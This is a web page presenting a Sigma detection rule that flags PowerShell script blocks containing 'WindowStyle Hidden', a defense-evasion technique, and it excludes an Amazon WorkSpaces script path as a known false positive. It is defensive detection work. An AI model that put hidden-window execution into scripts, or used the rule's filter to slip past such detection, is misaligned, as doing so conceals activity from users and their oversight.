Suspicious PowerShell WindowStyle Option
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
Sigma rule (View on GitHub)
1title: Suspicious PowerShell WindowStyle Option
2id: 313fbb0a-a341-4682-848d-6d6f8c4fab7c
3status: test
4description: |
5 Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.
6 In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
7references:
8 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md
9author: frack113, Tim Shelton (fp AWS)
10date: 2021/10/20
11modified: 2023/01/03
12tags:
13 - attack.defense_evasion
14 - attack.t1564.003
15logsource:
16 product: windows
17 category: ps_script
18 definition: 'Requirements: Script Block Logging must be enabled'
19detection:
20 selection:
21 ScriptBlockText|contains|all:
22 - 'powershell'
23 - 'WindowStyle'
24 - 'Hidden'
25 filter:
26 ScriptBlockText|contains|all:
27 - ':\Program Files\Amazon\WorkSpacesConfig\Scripts\'
28 - '$PSScriptRoot\Module\WorkspaceScriptModule\WorkspaceScriptModule'
29 condition: selection and not filter
30falsepositives:
31 - Unknown
32level: medium
References
-
Small and highly portable detection tests based on MITRE's ATT&CK. - redcanaryco/atomic-red-team
Read More
Related rules
- Clearing Windows Console History
- NTFS Alternate Data Stream
- Potential PowerShell Downgrade Attack
- PowerShell Deleted Mounted Share
- Powershell Store File In Alternate Data Stream